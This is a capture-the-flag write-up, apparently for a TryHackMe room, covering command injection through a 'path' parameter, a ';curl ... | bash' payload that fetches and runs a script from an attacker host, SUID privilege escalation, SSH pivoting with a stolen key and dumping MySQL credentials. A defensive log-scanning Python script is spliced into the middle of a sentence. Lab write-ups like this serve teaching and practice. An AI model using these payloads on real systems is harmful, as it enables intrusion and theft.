Where am I? Catch me
Command :
nmap -T5 10.10.235.114
Four open ports, including at least two SSH services (ports 22 and 8022) and an unknown service on port 2222.
dirsearch -u 10.10.235.114 -x 403
Dirsearch finds several web pages, including /index.php/login. This page shows us the contents of a folder, probably /var/www/html. The page source contains this hint:
<!-- where is the path? -->
The hint indicates that we have to find the right path to obtain an LFI/RCE. We will use wfuzz.
Command :
wfuzz -u http://10.10.235.114/index.php?FUZZ=id -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --filter 'h!=329'
The parameter found is: path
With Burp Suite, a few tests make it clear how login.php?path= works. Since the parameter already feeds an ls command that runs on its own, a semicolon (;) is needed to append an additional command.
Still in Burp Suite, we fetch a bash script served from the Kali machine and pipe it into bash (|).
Command :
;curl+http://10.11.38.124:8585/test.sh | bash
Remember to URL-encode the command (Ctrl+U in Burp) so that the server interprets it correctly.
So that curl can retrieve the test.sh file, a web server has to be started with Python using the following command:
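As an added defensive example (not part of the original write-up), the following Python script scans web-server access log lines for the injection pattern described above: shell metacharacters or a download-and-execute chain hidden in the URL-encoded path parameter. The log lines, field names and regexes are constructed assumptions, not data from the room.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed Apache-style access log lines (assumed format, not from the room).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /login.php?path=images HTTP/1.1" 200 329
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /login.php?path=%3Bid HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /login.php?path=%3Bcurl+http%3A%2F%2F10.11.38.124%3A8585%2Ftest.sh+%7C+bash HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 1200
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that allow a second command to be chained onto the ls.
META_RE = re.compile(r'[;|&`$]')
# A fetch tool piped straight into a shell (the curl ... | bash chain above).
DOWNLOAD_EXEC_RE = re.compile(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b', re.I)


def classify_request(target):
    """Return the findings for one request target (path plus query string)."""
    findings = []
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in query.get("path", []):
        # parse_qs already percent-decodes; decode once more so that a
        # double-encoded payload does not slip past the checks.
        decoded = unquote_plus(value)
        if META_RE.search(decoded):
            findings.append("shell-metachar")
        if DOWNLOAD_EXEC_RE.search(decoded):
            findings.append("download-and-exec")
    return findings


def scan_log(text):
    """Return (client ip, target, findings) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m["target"])
        if findings:
            hits.append((m["ip"], m["target"], findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, ", ".join(findings))
```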
python3.9 -m http.server 8585
Contents of the test.sh file:
Command :
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
The binary crypt is SUID root and can be run by anyone. If we try to run it with an additional argument, for example ./crypt id, it returns an error message:
Unable to decompress.
Command :
./crypt mike
We end up with a root shell, which must be inside a container. We enumerate it with linpeas.
Command to download it:
wget http://10.11.38.124:8585/linpeas2.sh
In mike's home directory there is a private key, id_rsa, that we will try to use. It remains to be seen which SSH server accepts this key.
The system has three network interfaces (192.168.250.10, 172.16.20.2, 127.0.0.1). The key does not work against any of these addresses.
The following ping sweep reveals a new IP address, to which we can connect over SSH.
for ip in $(seq 1 255); do ping -c 1 172.16.20.$ip; done
Command :
ssh mike@172.16.20.6 -i id_rsa
It is not possible to reach the TryHackMe network, probably because there is no routing between the different network interfaces and the container, so enumeration has to be done manually.
A MySQL server is listening on the loopback interface.
Command :
netstat -tulpn
Command :
mysql -u mike -p
The connection requires a password, which has to be guessed.
List of commands to extract the credentials of the user accounts:
show databases;
use accounts;
show tables;
select * from users;
We get the password for the root account. All you have to do is connect to it and retrieve the flag.
That's all, folks.
Thank you for taking the trouble to come to the site to read this write-up.
I hope it helped you and taught you new things.
Please feel free to leave a comment or share this article.